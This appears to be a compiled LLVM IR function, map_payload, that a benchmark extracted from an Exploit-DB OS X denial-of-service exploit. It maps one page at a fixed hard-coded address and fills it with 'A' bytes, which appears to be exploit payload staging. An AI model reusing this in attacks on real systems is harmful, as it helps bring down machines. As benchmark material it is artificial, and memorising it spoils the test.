; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39607.c_map_payload.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39607.c_map_payload.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@PROT_READ = common dso_local global i32 0, align 4
@PROT_WRITE = common dso_local global i32 0, align 4
@MAP_FIXED = common dso_local global i32 0, align 4
@MAP_ANON = common dso_local global i32 0, align 4
@MAP_PRIVATE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [41 x i8] c"MAP_FIXED didn't give us the right page\0A\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @map_payload(i32 %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca i32***, align 8
  %4 = alloca i8*, align 8
  %5 = alloca i8*, align 8
  store i32 %0, i32* %2, align 4
  store i32*** inttoptr (i64 32338577280 to i32***), i32**** %3, align 8
  store i8* inttoptr (i64 32338575360 to i8*), i8** %4, align 8
  %6 = load i8*, i8** %4, align 8
  %7 = load i32, i32* @PROT_READ, align 4
  %8 = load i32, i32* @PROT_WRITE, align 4
  %9 = or i32 %7, %8
  %10 = load i32, i32* @MAP_FIXED, align 4
  %11 = load i32, i32* @MAP_ANON, align 4
  %12 = or i32 %10, %11
  %13 = load i32, i32* @MAP_PRIVATE, align 4
  %14 = or i32 %12, %13
  %15 = call i8* @mmap(i8* %6, i32 4096, i32 %9, i32 %14, i32 -1, i32 0)
  store i8* %15, i8** %5, align 8
  %16 = load i8*, i8** %4, align 8
  %17 = load i8*, i8** %5, align 8
  %18 = icmp ne i8* %16, %17
  br i1 %18, label %19, label %23

19:                                               ; preds = %1
  %20 = call i32 @printf(i8* getelementptr inbounds ([41 x i8], [41 x i8]* @.str, i64 0, i64 0))
  %21 = load i32, i32* @EXIT_FAILURE, align 4
  %22 = call i32 @exit(i32 %21) #3
  unreachable

23:                                               ; preds = %1
  %24 = load i8*, i8** %5, align 8
  %25 = call i32 @memset(i8* %24, i8 signext 65, i32 4096)
  ret void
}

declare dso_local i8* @mmap(i8*, i32, i32, i32, i32, i32) #1

declare dso_local i32 @printf(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @memset(i8*, i8 signext, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
